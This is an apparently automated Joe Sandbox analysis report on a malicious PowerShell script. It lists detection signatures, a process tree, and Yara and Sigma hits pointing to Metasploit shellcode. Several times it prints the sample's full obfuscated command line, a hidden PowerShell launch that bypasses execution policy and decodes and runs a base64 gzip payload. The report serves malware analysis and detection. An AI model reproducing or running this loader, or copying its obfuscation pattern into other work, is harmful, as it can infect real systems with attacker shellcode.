Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x6bjOrKFQn.ps1

Overview

General Information

Sample name:x6bjOrKFQn.ps1
renamed because original name is a hash value
Original sample name:bfa856e4339bfadacdcb6730a256353e0b09dd0d20f0571bed84a4226b65b740.ps1
Analysis ID:1542797
MD5:b2cc4f57ccfdb79e1f65bdcc203afecb
SHA1:56be6d9cfc79e265765f4fa4a13a34f422c28c94
SHA256:bfa856e4339bfadacdcb6730a256353e0b09dd0d20f0571bed84a4226b65b740
Tags:206-41-208-89ps1user-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 7724 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 7740 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp" "c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7760 cmdline: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0x75:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x90a109:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0x90a16d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
Process Memory Space: powershell.exe PID: 7532INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1d237a:$b2: ::FromBase64String(
  • 0x1d29d6:$b2: ::FromBase64String(
  • 0x1ff7e3:$b2: ::FromBase64String(
  • 0x2453da:$b2: ::FromBase64String(
  • 0x2d770:$s1: -join
  • 0x3a845:$s1: -join
  • 0x3dc17:$s1: -join
  • 0x3e2c9:$s1: -join
  • 0x3fdba:$s1: -join
  • 0x41fc0:$s1: -join
  • 0x427e7:$s1: -join
  • 0x43057:$s1: -join
  • 0x43792:$s1: -join
  • 0x437c4:$s1: -join
  • 0x4380c:$s1: -join
  • 0x4382b:$s1: -join
  • 0x4407b:$s1: -join
  • 0x441f7:$s1: -join
  • 0x4426f:$s1: -join
  • 0x44302:$s1: -join
  • 0x44568:$s1: -join
Click to see the 1 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
0.2.powershell.exe.1fde84bce30.1.raw.unpackWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0xbf2d9:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
0.2.powershell.exe.1fde84bce30.1.raw.unpackWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0xbf33d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
0.2.powershell.exe.1fde84bc000.2.raw.unpackWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0xc0109:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
0.2.powershell.exe.1fde84bc000.2.raw.unpackWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0xc016d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Sigma Signatures

System Summary

barindex
Sigma detected: Base64 Encoded PowerShell Command Detected
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))", CommandLine: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzK
Sigma detected: Potential PowerShell Command Line Obfuscation
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))", CommandLine: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzK
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))", CommandLine: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzK
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))", CommandLine: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 